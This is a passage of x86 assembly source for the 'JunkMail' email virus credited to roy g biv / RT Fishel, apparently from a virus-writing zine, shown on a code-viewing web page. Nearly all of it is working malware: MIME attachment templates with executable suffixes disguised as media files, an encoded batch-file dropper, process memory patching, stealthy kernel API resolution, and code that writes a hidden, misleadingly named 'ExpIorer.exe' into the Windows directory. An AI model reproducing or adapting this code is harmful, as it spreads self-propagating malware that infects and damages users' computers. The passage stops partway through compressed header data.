📄 29a-7.005
字号:
;-----------------------------------------------------------------------------
;and, of course, a not-exploited type
;-----------------------------------------------------------------------------
usecide db offset usecidf - offset $ - 1, "APPLICATION/OCTET-STREAM;"
usecidf db 0
part31 db offset suffix1 - offset $ - 2, " NAME=EMAIL", 0
suffix1 db 8ah
db offset suffix1b - offset $ - 1, ".AVI"
suffix1b db offset suffix1c - offset $ - 1, ".BMP"
suffix1c db offset suffix1d - offset $ - 1, ".DOC"
suffix1d db offset suffix1e - offset $ - 1, ".GIF"
suffix1e db offset suffix1f - offset $ - 1, ".JPG"
suffix1f db offset suffix1g - offset $ - 1, ".MDB"
suffix1g db offset suffix1h - offset $ - 1, ".MPG"
suffix1h db offset suffix1i - offset $ - 1, ".TXT"
suffix1i db offset suffix1j - offset $ - 1, ".XLS"
suffix1j db offset suffix1k - offset $ - 1, ".ZIP"
suffix1k db 0
suffix2 db 86h
db offset suffix2b - offset $ - 1, ".BAT" ;text, not binary
;binary cannot be .bat in Windows NT/2000/XP
suffix2b db offset suffix2c - offset $ - 1, ".COM"
suffix2c db offset suffix2d - offset $ - 1, ".EXE"
suffix2d db offset suffix2e - offset $ - 1, ".PIF" ;hidden
suffix2e db offset suffix2f - offset $ - 1, ".SCR"
suffix2f db offset suffix2g - offset $ - 1, ".SHS" ;ole2, hidden
;.shb cannot launch in Windows 2000/XP
suffix2g db 0
part32 db offset part33 - offset $ - 2, "BASE64", 0
part33 db offset part34 - offset $ - 2, 0dh, "CONTENT-ID:", 0
part34 db offset batdrop1 - offset $ - 2, '<', ourcid, '>', 0
;-----------------------------------------------------------------------------
;OS-independent .bat dropper
;-----------------------------------------------------------------------------
batdrop1 db offset batdrop2 - offset $ - 1
db "@ECHO OFF", 0dh
db "SET %R=^^^^", 0dh
db "IF NOT %OS%T==T GOTO F", 0dh
db "SET %R=^", 0dh
db ":F", 0dh
;-----------------------------------------------------------------------------
;COM2ASCII-encoded base64 decoder without dictionary by RT Fishel
;-----------------------------------------------------------------------------
batdrop2 db offset batdrop3 - offset $ - 1
db "ECHO XPH74bP%R%5W1P](d!(d')t)(d)(d+)t.)t/)l0)l4)t6)t7)t8)l9)l;(d?)lB(dE(dG(dI)tJ(dJ)tK(dL)tM)tN)tP(dP)lR)lR)tU(dU"
batdrop3 db offset part35 - offset $ - 2
db ")tZ)tc)tl)tnVX,B,BP_ %%GW44PW%R%jD[FFKt(fDl4Yf():l0s54$)Q444l?v8,ElIv2,6f?C+8IGh)ho(fBQFNu1jRQX5TmZ4#P[5F@IZ4#*I=", 0dh, 0
part35 db offset part36 - offset $ - 2, ".", 0dh, 0
part36 db offset part37 - offset $ - 2, "QUIT", 0dh, 0
part37 equ $
include junkmail.inc
txttitle db "JunkMail", 0
if compress_only
txtbody db "compress done", 0
else
txtbody db "running...", 0
patch_host label near
pop ecx
push ecx
call $ + 5
pop eax
add eax, offset host_patch - offset $ + 6
sub ecx, eax
push ecx
mov eax, esp
xor edi, edi
push edi
push 4
push eax
push offset host_patch + 1
push esi
call WriteProcessMemory
jmp junkmail_inf
;-----------------------------------------------------------------------------
;everything before this point is dropper code
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;virus code begins here in infected files
;-----------------------------------------------------------------------------
junkmail_inf proc near
pushad
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
expcrcbegin label near ;place < 80h bytes from call for smaller code
dd (expcrc_count + 1) dup (0)
expcrcend label near
dd offset drop_exp - offset expcrcend + 4
db "JunkMail - roy g biv / RT Fishel"
;spam just got harder to remove ;)
walk_seh label near
xor esi, esi
lods dword ptr fs:[esi]
inc eax
seh_loop label near
dec eax
xchg esi, eax
lods dword ptr [esi]
inc eax
jne seh_loop
lods dword ptr [esi]
;-----------------------------------------------------------------------------
;moved label after some data because "e800000000" looks like virus code ;)
;-----------------------------------------------------------------------------
init_findmz label near
inc eax
xchg edi, eax
find_mzhdr label near
;-----------------------------------------------------------------------------
;do not use hard-coded kernel address values because it is not portable
;Microsoft used all different values for 95, 98, NT, 2000, Me, XP
;they will maybe change again for every new release
;-----------------------------------------------------------------------------
dec edi ;sub 64kb
xor di, di ;64kb align
call is_pehdr
jne find_mzhdr
mov ebx, edi
pop edi
;-----------------------------------------------------------------------------
;parse export table
;-----------------------------------------------------------------------------
mov esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff]
lea esi, dword ptr [ebx + esi + peexp.expordbase]
lods dword ptr [esi] ;Ordinal Base
lea ebp, dword ptr [eax * 2 + ebx]
lods dword ptr [esi]
lods dword ptr [esi]
lods dword ptr [esi] ;Export Address Table RVA
lea edx, dword ptr [ebx + eax]
lods dword ptr [esi] ;Name Pointer Table RVA
add ebp, dword ptr [esi] ;Ordinal Table RVA
lea ecx, dword ptr [ebx + eax]
mov esi, ecx
push_export label near
push ecx
get_export label near
lods dword ptr [esi]
push ebx
add ebx, eax ;Name Pointer VA
or eax, -1
crc_outer label near
xor al, byte ptr [ebx]
push 8
pop ecx
crc_inner label near
add eax, eax
jnb crc_skip
xor eax, 4c11db7h ;use generator polymonial (see IEEE 802)
crc_skip label near
loop crc_inner
sub cl, byte ptr [ebx] ;carry set if not zero
inc ebx ;carry not altered by inc
jb crc_outer
pop ebx
cmp dword ptr [edi], eax
jne get_export
;-----------------------------------------------------------------------------
;exports must be sorted alphabetically, otherwise GetProcAddress() would fail
;this allows to push addresses onto the stack, and the order is known
;-----------------------------------------------------------------------------
pop ecx
mov eax, esi
sub eax, ecx ;Name Pointer Table VA
shr eax, 1
movzx eax, word ptr [ebp + eax - 4] ;get export ordinal
mov eax, dword ptr [eax * 4 + edx] ;get export RVA
add eax, ebx
push eax
scas dword ptr [edi]
cmp dword ptr [edi], 0
jne push_export
add edi, dword ptr [edi + 4]
jmp edi
dispname label near
db "ExpIorer", 0
explabel label near
db "ExpIorer.exe", 0
drop_exp label near
mov ebx, esp
lea esi, dword ptr [edi + offset explabel - offset drop_exp]
mov edi, offset junkmail_codeend - offset junkmail_inf + expsize + 80h + 1ffh
;file size must be > end of last section
push edi
xor ebp, ebp ;GMEM_FIXED
push ebp
call dword ptr [ebx + expcrcstk.pGlobalAlloc]
push eax ;GlobalFree
push ebp ;WriteFile
push esp ;WriteFile
push edi ;WriteFile
push ebp ;CreateFileA
push FILE_ATTRIBUTE_HIDDEN ;CreateFileA
push CREATE_ALWAYS ;CreateFileA
push ebp ;CreateFileA
push ebp ;CreateFileA
push GENERIC_WRITE ;CreateFileA
push eax ;CreateFileA
lea ecx, dword ptr [eax + 7fh]
push ecx ;MoveFileA
push eax ;MoveFileA
push eax ;GetFileAttributesA
push ebp ;SetFileAttributesA
push eax ;SetFileAttributesA
push ecx ;DeleteFileA
push ecx ;GetTempFileNameA
push ebp ;GetTempFileNameA
push esp ;GetTempFileNameA
push eax ;GetTempFileNameA
push edi ;GetWindowsDirectoryA
push eax ;GetWindowsDirectoryA
xchg ebp, eax
call dword ptr [ebx + expcrcstk.pGetWindowsDirectoryA]
lea edi, dword ptr [ebp + eax - 1]
call dword ptr [ebx + expcrcstk.pGetTempFileNameA]
call dword ptr [ebx + expcrcstk.pDeleteFileA]
mov al, '\'
scas byte ptr [edi]
je skip_slash
stos byte ptr [edi]
;-----------------------------------------------------------------------------
;append exe name, assumes name is 0dh bytes long
;-----------------------------------------------------------------------------
skip_slash label near
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs byte ptr [edi], byte ptr [esi]
;-----------------------------------------------------------------------------
;anti-anti-file dropper - remove read-only attribute, delete file, rename directory
;-----------------------------------------------------------------------------
call dword ptr [ebx + expcrcstk.pSetFileAttributesA]
call dword ptr [ebx + expcrcstk.pGetFileAttributesA]
test al, FILE_ATTRIBUTE_DIRECTORY
pop ecx
pop eax
je skip_move
push eax
push ecx
call dword ptr [ebx + expcrcstk.pMoveFileA]
skip_move label near
call dword ptr [ebx + expcrcstk.pCreateFileA]
push edi ;WriteFile
push ebx
xchg ebp, eax
call dword ptr [ebx + expcrcstk.pGetTickCount]
xchg ebx, eax
xor ecx, ecx
;-----------------------------------------------------------------------------
;decompress MZ header, PE header, section table, import table
;-----------------------------------------------------------------------------
call decomprle
expsize equ 0d4h
;RLE-based compressed MZ header, PE header, import table, section table
;execution continues immediately after compressed data. be careful ;)
dd 11111111110000011100001011100000b
; mmmmmmmmmmz 01mmz 02mmm
db 'M', 'Z', "gdi32.dll", 'P', 'E', 4ch, 1, 1
dd 00000110000111100001001010010000b
; z 01mz 03mmz 02r 04m
db 2, 2ch, 10h, 88h
dd 00000111110100100001001000111110b
; z 01mmmmr 02z 04mz 07mm
db 0fh, 3, 0bh, 1, 56h, (offset junkmail_exe - offset junkmail_inf + expsize) and 0ffh, ((junkmail_exe - offset junkmail_inf + expsize + 1000h) shr 8) and 0ffh
dd 00001001010010001011000010100001b
; z 02r 04mz 05mz 02mz 02
db 0ch, 40h, 10h
dd 00000110000101010111100001111100b
; z 01mz 02mr 07mz 03mmm
db 2, 1, 4, "Arc"
dd 00001010000101000111100000101001b
; z 02mz 03mz 07mz 01r 02
db ((junkmail_codeend - offset junkmail_inf + expsize + 80h + 1fffh) and not 0fffh) shr 8, expsize, 2
dd 10000111000011100001110000110101b
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -